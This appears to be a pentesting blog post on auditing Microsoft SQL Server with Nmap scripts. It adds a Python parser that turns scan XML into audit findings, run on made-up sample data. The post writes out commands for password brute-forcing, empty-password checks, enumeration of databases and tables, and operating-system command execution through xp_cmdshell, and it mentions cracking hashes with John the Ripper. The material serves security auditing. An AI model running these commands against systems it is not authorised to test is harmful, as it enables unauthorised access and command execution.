The Nmap Scripting Engine (NSE) lets us use Nmap not only as a port scanner but as a complete penetration testing platform.
In this post we will look at some techniques we can apply to a network to check our SQL servers.
By default, Microsoft SQL Server listens on TCP port 1433.
From a shell we can run the following command (xxx.xxx.xxx.xxx is the IP address of the SQL Server):
nmap -p1433 --script ms-sql-info xxx.xxx.xxx.xxx
The combination of Nmap and the Nmap Scripting Engine immediately gives us information about the SQL Server version as well as the instance name.
The Nmap Scripting Engine also includes ms-sql-brute, which checks for weak passwords. The command is:
nmap -p1433 --script ms-sql-brute xxx.xxx.xxx.xxx
If this finds nothing we can also supply a custom word list. Assuming the file containing the passwords is pass.txt, the command becomes:
nmap -p1433 --script ms-sql-brute --script-args userdb=/var/pass.txt,passdb=/var/pass.txt xxx.xxx.xxx.xxx
The Nmap Scripting Engine also lets us find empty passwords in infrastructures running Microsoft SQL Server. The command is as follows:
nmap -p1433 --script ms-sql-empty-password xxx.xxx.xxx.xxx
Here we see that the sa account has no password. To find out which databases sa has access to, we use the ms-sql-hasdbaccess script with the following arguments:
nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sa xxx.xxx.xxx.xxx
Next we list the tables in those databases with the following command:
nmap -p1433 --script ms-sql-tables --script-args mssql.username=sa xxx.xxx.xxx.xxx
In older versions of MSSQL (SQL Server 2000) xp_cmdshell is enabled by default (SQL Server 2005 and later ship with it disabled), and we can execute operating system commands through Nmap scripts such as:
nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa xxx.xxx.xxx.xxx
Then:
nmap -p1433 --script ms-sql-xp-cmdshell --script-args ms-sql-xp-cmdshell.cmd='net users',mssql.username=sa xxx.xxx.xxx.xxx
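When checking many servers it is more practical to have Nmap write XML (-oX) and turn the script output into a findings list. As an added example that is not part of the original post, the Python script below parses that XML, flags hosts where ms-sql-empty-password reports a successful login and hosts where ms-sql-info reports SQL Server 2000 (where xp_cmdshell is on by default), and prints them as an audit report. The host addresses and script output strings in SAMPLE_XML are constructed samples in the shape nmap produces; the finding labels are my own.

```python
"""Turn nmap -oX output from the ms-sql-* NSE scripts into an audit findings list."""
import sys
import xml.etree.ElementTree as ET

# Constructed sample imitating the XML nmap writes with -oX when the
# ms-sql-info and ms-sql-empty-password scripts run (addresses and output
# strings are made up for illustration).
SAMPLE_XML = """<nmaprun scanner="nmap">
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="1433">
        <state state="open"/>
        <script id="ms-sql-info" output="192.0.2.10:1433: Version: Microsoft SQL Server 2000 Instance name: MSSQLSERVER"/>
        <script id="ms-sql-empty-password" output="[192.0.2.10:1433] sa:&lt;empty&gt; =&gt; Login Success"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="1433">
        <state state="open"/>
        <script id="ms-sql-info" output="192.0.2.11:1433: Version: Microsoft SQL Server 2019 RTM"/>
        <script id="ms-sql-empty-password" output="[192.0.2.11:1433] No credentials found"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_findings(xml_text):
    """Return a list of (address, finding, evidence) tuples from nmap XML.

    Both port scripts (under <ports>) and host scripts (under <hostscript>)
    are scanned, since the ms-sql-* scripts can appear in either place.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.findall("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for script in host.iter("script"):
            sid = script.get("id", "")
            out = script.get("output", "").strip()
            # ms-sql-empty-password prints "Login Success" only when a blank
            # password was accepted for the account it tried.
            if sid == "ms-sql-empty-password" and "Login Success" in out:
                findings.append((addr, "empty-password", out))
            # SQL Server 2000 enables xp_cmdshell by default.
            if sid == "ms-sql-info" and "SQL Server 2000" in out:
                findings.append((addr, "legacy-version", out))
    return findings


def format_report(findings):
    """Render findings as one line per issue, for a quick audit summary."""
    if not findings:
        return "no findings"
    return "\n".join(f"{addr}\t{kind}\t{evidence}" for addr, kind, evidence in findings)


if __name__ == "__main__":
    # Usage: python mssql_audit.py scan.xml   (falls back to the sample above)
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            data = fh.read()
    else:
        data = SAMPLE_XML
    print(format_report(parse_findings(data)))
```

To use it against real output, run the scripts above with -oX scan.xml added and pass scan.xml as the first argument; each flagged host is one server whose sa password or version should be fixed before an attacker finds it the same way.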
We should also mention that Nmap and the Nmap Scripting Engine can be combined with other tools such as John the Ripper, which we can use on the extracted password hashes to proceed with password cracking.
We warmly thank SecTeam @johnzontos.